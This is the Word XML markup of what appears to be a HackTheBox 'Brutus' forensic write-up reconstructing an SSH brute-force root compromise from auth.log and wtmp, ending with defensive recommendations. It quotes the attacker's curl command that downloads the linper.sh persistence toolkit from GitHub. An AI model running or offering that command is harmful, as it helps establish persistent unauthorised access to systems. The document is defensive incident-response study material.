                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Post 06:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745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5BB0C1DC">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>executes:/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76C0463D">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164394A4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.V  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SEVERITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292D050">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This incident is classified as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>High Severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to confirmed root-level compromise, creation of a privileged backdoor account, and download of a persistence toolkit. The exposure of SSH on a publicly accessible server with weak or guessable root credentials represents a critical configuration failure. The attacker achieved full administrative control of the system within minutes of initiating the brute force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503A28C6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.VI  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KEY OUTCOMES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B4063">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified and attributed the attacker IP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>65.2.161.68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D179DF">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed root account compromised via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSH brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294D7A3">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Distinguished automated Session 34 from manual interactive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session 37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C523D5E">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed manual login timestamp: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2024-03-06 06:32:45 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE31DAC">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified persistence account: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyberjunkie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with sudo privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D05DB0E">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapped persistence to MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T1136.001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5F34D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed session end: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>06:37:24 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33496098">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovered full sudo command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linper.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> downloaded via curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BF4FF1">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F0FB7B">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F594F22">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE4C0DF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">IX.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0C3CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082D40B6">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E4D253">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This investigation provided a complete reconstruction of an SSH brute force attack and its subsequent post-compromise activities using only Unix authentication log artifacts. By systematically analyzing auth.log and wtmp, the attacker’s IP address, compromised account, session identifiers, persistence mechanisms, and tool downloads were all identified and attributed with supporting log evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86971F">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The investigation reinforced that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auth.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is far more than a brute force detection tool — it provides visibility into privilege escalation, account management, sudo usage, and command execution when read carefully and correlated with complementary artifacts such as wtmp. This depth of insight from a single log file makes Unix authentication logs an essential artifact in any Linux-based incident response investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC05266">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The rapid compromise of the root account highlights the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>critical risk of weak credentials combined with exposed SSH services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, reinforcing the need for strong authentication controls and continuous monitoring of authentication logs for anomalous patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754800D5">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>From a defensive standpoint, this attack highlights several critical control gaps: SSH should not be exposed publicly on internal services without key-based authentication enforcement; root login via SSH should be explicitly disabled; and privilege escalation via sudo should be logged and monitored for anomalous patterns. Each of the attacker’s actions — from the brute force to the persistence script download — was detectable through standard logging if appropriate alerting thresholds were in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD12D2">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Implementing tools such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fail2Ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to automatically block repeated failed login attempts, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disabling root SSH login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the sshd configuration, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enforcing key-based authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> would significantly reduce the likelihood of such attacks succeeding in future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B23642">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This exercise demonstrates that effective security is not achieved by tools alone, but by the ability to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>understand, correlate, and act on attacker behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across the full attack lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134"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BB29E">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="C8CDD5" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9450"/>
      </w:tabs>
      <w:spacing w:before="100" w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="3A3A3A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>SSH Brute Force &amp; Privilege Escalation Investigation</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="3A3A3A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="3A3A3A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="3A3A3A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="3A3A3A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="3A3A3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8E7A9">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="0D7377" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:spacing w:before="0" w:after="100"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="3A3A3A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> HackTheBox Sherlock — Brutus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073A77F0"/>
    <w:rsid w:val="2DC778E8"/>
    <w:rsid w:val="4AA269B1"/>
    <w:rsid w:val="4E391DC2"/>
